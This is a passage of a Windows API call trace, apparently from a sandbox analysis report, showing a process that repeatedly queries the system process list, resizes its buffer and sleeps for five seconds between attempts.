RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.878] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.908] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.917] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.934] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.949] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.974] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 